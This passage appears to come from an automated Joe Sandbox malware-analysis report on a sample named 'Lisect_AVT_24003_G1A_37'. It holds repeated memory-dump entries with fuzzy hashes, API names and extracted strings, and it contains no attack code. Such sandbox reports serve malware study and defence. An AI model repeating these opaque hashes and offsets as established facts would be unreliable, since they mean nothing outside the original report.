                                    • Source File: 00000000.00000002.3930926346.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e90000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8f48703373404af8757ad38a36d9ae93c9acf1615a5f6693be38bfc119e17873
                                    • Instruction ID: 551a74e598bc231d6e4480419e5aa2ee63eaf0b7c0ab3af167e92420877ba3b3
                                    • Opcode Fuzzy Hash: 8f48703373404af8757ad38a36d9ae93c9acf1615a5f6693be38bfc119e17873
                                    • Instruction Fuzzy Hash: 01018EBB64C215BFE98284C12B549FA7BAEF3C33303B09426F843D6542E2942E497571
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930926346.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e90000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 319548b546907973ecca9835641c21479aa310e3891461bb6e93c0bb3d0509e7
                                    • Instruction ID: 2d4d37256d36267d15637e1eb4d32430551298e0827c91e6bd5461dc0535369e
                                    • Opcode Fuzzy Hash: 319548b546907973ecca9835641c21479aa310e3891461bb6e93c0bb3d0509e7
                                    • Instruction Fuzzy Hash: D8F090BB20C115FFE901C1916F64AFB67AEE3C57307B09816F847C6582E2982E4A7171
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930926346.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e90000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2b4a717d3343fa21de869c8bb6c960ee5e9d9113fee5b723d49fbedc1d67a5ea
                                    • Instruction ID: 96dfd6e794aea9c84a5352b1bf50220de7a6c47dd6b1af86823e0417e318a2c2
                                    • Opcode Fuzzy Hash: 2b4a717d3343fa21de869c8bb6c960ee5e9d9113fee5b723d49fbedc1d67a5ea
                                    • Instruction Fuzzy Hash: 07F089B720C610EFE640C6516A69AFBBBEDF7D13307B1981BF443D5441D3582949B131
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930926346.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e90000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 59174fd7687cf2ec1470a9a8da2795ab51f1e655355fb82d3e78bd38514abe0e
                                    • Instruction ID: 96c1205b26e600e49fdd02ec9caabab56939e16269f6ae4e01784891cf6440ff
                                    • Opcode Fuzzy Hash: 59174fd7687cf2ec1470a9a8da2795ab51f1e655355fb82d3e78bd38514abe0e
                                    • Instruction Fuzzy Hash: 1FF02BF711C110AFFA02C5A13A509FB3BECE7C13213619847F4C6C5442D20D1E4AA132
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930926346.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e90000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 750b9b5f9a5074194eb14773ec899bbd34b7376b84c50ae5a85ec68a96f8807e
                                    • Instruction ID: 779d0866736e5c30fe3bea30056673eb5b0aeafdcf7aec2fb291ccfd0e1bfcb2
                                    • Opcode Fuzzy Hash: 750b9b5f9a5074194eb14773ec899bbd34b7376b84c50ae5a85ec68a96f8807e
                                    • Instruction Fuzzy Hash: DAD09E7760C121EEE541C5923B187F957E9A6D07313B19953F443C5485E2595A4E7031
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3930926346.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4e90000_Lisect_AVT_24003_G1A_37.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8f04df1963f8c57d762e262f1a5ab63e1a44cd952d252d10cf597aa7da0bb8e2
                                    • Instruction ID: e53ff70fa749c6836bd75ff932acb0d0a5ab491b0373025ab1d38c55e286715a
                                    • Opcode Fuzzy Hash: 8f04df1963f8c57d762e262f1a5ab63e1a44cd952d252d10cf597aa7da0bb8e2
                                    • Instruction Fuzzy Hash: FFC08C6671C108DBCA44AAF1616C3F93BE567A03163D038C2F0C2CB4C1E626A985F224
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $+$+Inf$-Inf$Inf$NaN$gfff
                                    • API String ID: 0-2577472133
                                    • Opcode ID: 23749b871eda626637cab7ec5f9dda37d9129d418b5a810438560765c1fe59f1
                                    • Instruction ID: 41457a4fca3fddd78664a03ba5532f06e3d3adce09bceb63e4f8f86b46daaa5c
                                    • Opcode Fuzzy Hash: 23749b871eda626637cab7ec5f9dda37d9129d418b5a810438560765c1fe59f1
                                    • Instruction Fuzzy Hash: 2F8200309187898FD726CF28C55036BFBE5AFCA384F248A6EE9C997251D730C955CB42
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %s|%s$131$50500$L<:$L<:$t;:$type must be boolean, but is
                                    • API String ID: 0-1359761539
                                    • Opcode ID: 4b37570f8a8d8498407da4739c21f90a723a735ed2e97f1895088d710971bfe6
                                    • Instruction ID: 0856fc4c6a3a9c1525d8fde1a5712bcad96d6e60d63d195c7af98ed187320ff3
                                    • Opcode Fuzzy Hash: 4b37570f8a8d8498407da4739c21f90a723a735ed2e97f1895088d710971bfe6
                                    • Instruction Fuzzy Hash: 23231174C112598FEB25EF68C958BEDBBB0AF05300F1481DDE409AB292DB749E94CF91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$no such vfs: %s$sqlite_rename_table
                                    • API String ID: 0-1885142750
                                    • Opcode ID: 3c6846208a2e45137454d99539b85a8ce9d9636daa8598fbb4c1408d98f24059
                                    • Instruction ID: f1fed9cfd4124b7410733a01a56653a1023b07106b135493c2fedb75a92c873f
                                    • Opcode Fuzzy Hash: 3c6846208a2e45137454d99539b85a8ce9d9636daa8598fbb4c1408d98f24059
                                    • Instruction Fuzzy Hash: EB0226B0A40B009BEB238F14DC86B6B77E9EF41704F15442CE54A9F691D7B5FA85CB82
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: /Kim$/Kim$type must be number, but is $type must be string, but is
                                    • API String ID: 0-1144537432
                                    • Opcode ID: c2ded5a75a824bd5a3f9094e312a49a9c9b2d7ee0237536082978c8b09c97b13
                                    • Instruction ID: 43655db73c6fa406913fce534438f1c9e59f49a746fbc5721151694a87b0688f
                                    • Opcode Fuzzy Hash: c2ded5a75a824bd5a3f9094e312a49a9c9b2d7ee0237536082978c8b09c97b13
                                    • Instruction Fuzzy Hash: 41913671E002099FCB08CFADD88179DB7A9EB88310F54826EE819D7392D7755D46CB90
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Mtx_unlock
                                    • String ID:
                                    • API String ID: 1418687624-0
                                    • Opcode ID: 8cb637d067048b63ed59c14c1883ed8dab06d4a754e3ec57e22a21e27be1794c
                                    • Instruction ID: bf0181a444f7070f06f2c87511b09c1bdd88c04d267140d8fb064ce580a8e9fb
                                    • Opcode Fuzzy Hash: 8cb637d067048b63ed59c14c1883ed8dab06d4a754e3ec57e22a21e27be1794c
                                    • Instruction Fuzzy Hash: 99322731A1120A8FDF08EF68CC95BEEB7B5EF45304F144258E805AB2D2D775AE55CBA0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: File
                                    • API String ID: 0-749574446
                                    • Opcode ID: 1abb8360785431a47b20436cae0be934a170fbbb9c607f30359bdc02b0dd9297
                                    • Instruction ID: c2ed276e774c0d53e7eec3a32801d4f0cf67d1594bf2f44815bfa73c103a7537
                                    • Opcode Fuzzy Hash: 1abb8360785431a47b20436cae0be934a170fbbb9c607f30359bdc02b0dd9297
                                    • Instruction Fuzzy Hash: B1C1F270D102489FDF15DFA4CD46BEEBBB9EF45314F104069E508BB291E770A954CBA2
                                    APIs
                                    • GetSystemTimePreciseAsFileTime.KERNEL32(?,0034C6EA,?,?,?,?,00284A9B,?,0028F03C), ref: 0034CCF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$FilePreciseSystem
                                    • String ID:
                                    • API String ID: 1802150274-0
                                    • Opcode ID: f851fb8744d80123bed4403842c2616af09646f3621d0907ba2840308142a0dd
                                    • Instruction ID: b9cc05dca638beac777e002efd68e9cbb650067bb69aa5865ea9044224b7baf3
                                    • Opcode Fuzzy Hash: f851fb8744d80123bed4403842c2616af09646f3621d0907ba2840308142a0dd
                                    • Instruction Fuzzy Hash: 51D02232653138938E633B94BC0056DBBCCEF85B607095016EE0C3B150CA617C0057E0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::invalid_argument::invalid_argument
                                    • String ID: string too long
                                    • API String ID: 2141394445-2556327735
                                    • Opcode ID: 1e08563a173a006419b4600d59d76f16d04eb6c19a067bd38541bf5abdeeb7c4
                                    • Instruction ID: 644c23a74f478af6f027afd431f53adebfa35983034cfafba619321f0d58a0fd
                                    • Opcode Fuzzy Hash: 1e08563a173a006419b4600d59d76f16d04eb6c19a067bd38541bf5abdeeb7c4
                                    • Instruction Fuzzy Hash: C381F175A04196DFDB02CFA8C4517EEBFB5EF1A300F188199D9886B783C3758659CBA0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5f1a44a1cc40b2a5dd238493d1f1517ac9ec395c9e0157eff49252453c8d4afb
                                    • Instruction ID: f7ff3c83b873333c673ed2c65f71e21f348136e6157aa608c4ebe32e923a825b
                                    • Opcode Fuzzy Hash: 5f1a44a1cc40b2a5dd238493d1f1517ac9ec395c9e0157eff49252453c8d4afb
                                    • Instruction Fuzzy Hash: 27923631C202498BDF1ACFB8C8547FEBB75EF46314F24C299D8596B282D7305A5ACB91
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000633000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.000000000066F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.0000000000686000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3921929524.0000000000687000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923852313.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923905340.0000000000844000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3923961184.0000000000847000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3924038380.0000000000848000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_270000_Lisect_AVT_24003_G1A_37.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 79093a5f2d01eeaa5526eb47ca4635751f3a5d0c2a5c38a616d31166b5fe5e45
                                    • Instruction ID: e7825e2da3a58d74adcb6fbf919120642db89bf943313cf52aed4bdfd5d89504
                                    • Opcode Fuzzy Hash: 79093a5f2d01eeaa5526eb47ca4635751f3a5d0c2a5c38a616d31166b5fe5e45
                                    • Instruction Fuzzy Hash: 7F625DB0E1021A9BDB14CF59C5846AEFBF1BF88348F2481ADDA04AB342D775D956CF90
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000000.00000002.3909409252.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3909505303.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.3913589883.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
